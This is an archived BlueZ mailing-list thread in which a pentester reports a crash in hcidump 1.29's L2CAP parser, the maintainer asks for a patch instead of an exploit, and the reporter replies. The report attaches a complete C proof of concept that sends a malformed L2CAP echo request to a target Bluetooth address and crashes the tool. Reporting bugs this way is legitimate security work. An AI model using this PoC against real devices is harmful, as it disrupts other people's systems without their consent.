[Bluez-devel] Bug in l2cap.c

[Bluez-devel] Bug in l2cap.c

[Pierre BETOUIN]

[-- Attachment #1.1: Type: text/plain, Size: 1609 bytes --]

	Hi list,

Currently pentesting several bluetooth devices, I found a bug in hcidump
(tested version : 1.29). 

The affected code, located in l2cap.c, is :
------------------------------------------------------------------
while (frm->len >= L2CAP_CMD_HDR_SIZE) {
	if (!p_filter(FILT_L2CAP)) {
		p_indent(level, frm);
		printf("L2CAP(s): ");
	}
        
	switch (hdr->code) {
	l2cap_cmd_hdr *hdr = frm->ptr;
	frm->ptr += L2CAP_CMD_HDR_SIZE;
	frm->len -= L2CAP_CMD_HDR_SIZE;
	(...)
	default:
		if (p_filter(FILT_L2CAP))
			break;
		printf("code 0x%2.2x ident %d len %d\n",
			hdr->code, hdr->ident, btohs(hdr->len));
			raw_dump(level, frm);
	}
	frm->ptr += btohs(hdr->len);
	frm->len -= btohs(hdr->len);
------------------------------------------------------------------

# ./hcidump-crash 00:80:09:XX:XX:XX
L2CAP packet sent (15)
Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41

# hcidump
HCI sniffer - Bluetooth packet analyzer ver 1.29
device: hci0 snap_len: 1028 filter: 0xffffffff
< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11
< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
< ACL data: handle 41 flags 0x02 dlen 19
    L2CAP(s): debug : code=8
Echo req: dlen 12
    L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
(...)
    L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
segmentation fault

The PoC source file is joined.

	Pierre

-- 
Pierre BETOUIN
info16@unsigned.ath.cx
http://securitech.homeunix.org
GPG Key : 0x94D9CB23

[-- Attachment #1.2: hcidump-crash.c --]
[-- Type: text/x-csrc, Size: 1814 bytes --]

/*	hcidump v. 1.29 bluez				*/
/* 	Pierre BETOUIN <pierre.betouin@security-labs.org>	*/
/*	01/18/06						*/
/*	Crashes hcidump sending bad L2CAP packet		*/
/*								*/
/*	gcc -lbluetooth hcidump-crash.c -o hcidump-crash	*/
/*	./bug 00:80:37:XX:XX:XX					*/
/*	L2CAP packet sent (15)					*/
/*	Buffer: 08 01 0C 00 41 41 41 41 41 41 41 41 41 41 41	*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>

#define SIZE		15
#define FAKE_SIZE	12

int main(int argc, char **argv)
{
	char *buffer;
	l2cap_cmd_hdr *cmd;	
	struct sockaddr_l2 addr;
	int sock, sent, i;

	if(argc < 2)
	{
		fprintf(stderr, "%s <btaddr>\n", argv[0]);
		exit(EXIT_FAILURE);
	}
	
	if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) 
	{
		perror("socket");
		exit(EXIT_FAILURE);
	}

	memset(&addr, 0, sizeof(addr));
	addr.l2_family = AF_BLUETOOTH;

	if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) 
	{
		perror("bind");
		exit(EXIT_FAILURE);
	}

	str2ba(argv[1], &addr.l2_bdaddr);
	
	if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) 
	{
		perror("connect");
		exit(EXIT_FAILURE);
	}
	
	if(!(buffer = (char *) malloc ((int) SIZE + 1))) 
	{
		perror("malloc");
		exit(EXIT_FAILURE);
	}
	
	memset(buffer, 'A', SIZE);

	cmd = (l2cap_cmd_hdr *) buffer;
	cmd->code = L2CAP_ECHO_REQ;
	cmd->ident = 1;
	cmd->len = FAKE_SIZE;
	
	if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
	{
		printf("L2CAP packet sent (%d)\n", sent);
	}

	printf("Buffer:\t");
	for(i=0; i<sent; i++)
		printf("%.2X ", (unsigned char) buffer[i]);
	printf("\n");

	free(buffer);
	close(sock);
	return EXIT_SUCCESS;
}

[-- Attachment #2: Ceci est une partie de message numériquement signée --]
[-- Type: application/pgp-signature, Size: 189 bytes --]

Re: [Bluez-devel] Bug in l2cap.c

[Marcel Holtmann]

Hi Pierre,

> Currently pentesting several bluetooth devices, I found a bug in hcidump
> (tested version : 1.29). 

you know that hcidump is a testing/development utility? It is basically
not supposed to be fully robust against malicious packets.

Feel free to provide a patch and not an exploit.

Regards

Marcel




-------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems?  Stop!  Download the new AJAX search engine that makes
searching your log files as easy as surfing the  web.  DOWNLOAD SPLUNK!
http://sel.as-us.falkag.net/sel?cmd=lnk&kid=103432&bid=230486&dat=121642
_______________________________________________
Bluez-devel mailing list
Bluez-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/bluez-devel

Re: [Bluez-devel] Bug in l2cap.c

[Pierre BETOUIN]

[-- Attachment #1: Type: text/plain, Size: 767 bytes --]

	Hi Marcel,

Le mercredi 18 janvier 2006 à 18:54 +0100, Marcel Holtmann a écrit :
> Hi Pierre,
> 
> > Currently pentesting several bluetooth devices, I found a bug in hcidump
> > (tested version : 1.29). 
> 
> you know that hcidump is a testing/development utility? It is basically
> not supposed to be fully robust against malicious packets.
True, one more reason to correct this then, I agree with you ;)

> Feel free to provide a patch and not an exploit.
The patch is (nearly) in my previous mail : check it, I gave you the short piece 
of code concerned, should not give you headache fixing it.

> Regards
> 
> Marcel

Regards,

	Pierre 

-- 
Pierre BETOUIN
info16@unsigned.ath.cx
http://securitech.homeunix.org
GPG Key : 0x94D9CB23

[-- Attachment #2: Ceci est une partie de message numériquement signée --]
[-- Type: application/pgp-signature, Size: 189 bytes --]